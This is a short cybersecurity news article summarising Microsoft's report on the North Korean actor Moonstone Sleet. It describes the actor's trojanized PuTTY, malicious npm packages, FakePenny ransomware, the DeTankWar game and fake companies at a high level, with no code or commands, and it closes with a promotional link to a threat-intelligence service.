In a recent development, Microsoft has identified a new North Korean threat actor known as Moonstone Sleet, which has been employing a combination of traditional and innovative tactics to achieve its financial and cyberespionage objectives.
Moonstone Sleet, formerly tracked as Storm-1789, has demonstrated a sophisticated approach by using fake companies, trojanized software, and even a malicious game to infiltrate targets.
Exploiting New Vectors
Moonstone Sleet has been observed using trojanized versions of legitimate tools like PuTTY to gain initial access to organizations.
.png
)
This method involves delivering a modified PuTTY executable via platforms such as LinkedIn and Telegram, which, when executed, decrypts and loads additional malicious payloads.
The actor has also leveraged malicious npm packages to target software developers, often disguising these as part of a skills assessment or project collaboration.
According to Microsoft Report, these tactics highlight the actor’s ability to adapt and evolve its strategies, mirroring techniques used by other North Korean threat actors like Diamond Sleet.
Custom Ransomware and Malicious Games
One of the most notable tactics employed by Moonstone Sleet is the deployment of a custom ransomware variant named FakePenny.
This ransomware was used in an attack in April 2024, following a previous compromise in February.
The ransom demand was substantial, at $6.6 million in Bitcoin, indicating a significant financial objective.
Additionally, Moonstone Sleet has developed a fully functional malicious game called DeTankWar, which requires player registration and is used to deliver malware.
The game is promoted through fake companies and social media personas, adding a layer of legitimacy to the actor’s campaigns.
Moonstone Sleet’s operations are characterized by their breadth and sophistication.
The actor has created fake companies, such as StarGlow Ventures and C.C. Waterfall, to engage with potential targets in the education and software development sectors.
These companies are used to build relationships with organizations, potentially for future malicious access or revenue generation.
Moonstone Sleet’s ability to conduct concurrent operations across multiple campaigns suggests it is well-resourced and capable of expanding its capabilities, including the use of ransomware for disruptive operations.
Collect Threat Intelligence on the Latest Malware and Phishing Attacks with ANY.RUN TI Lookup -> Try for free
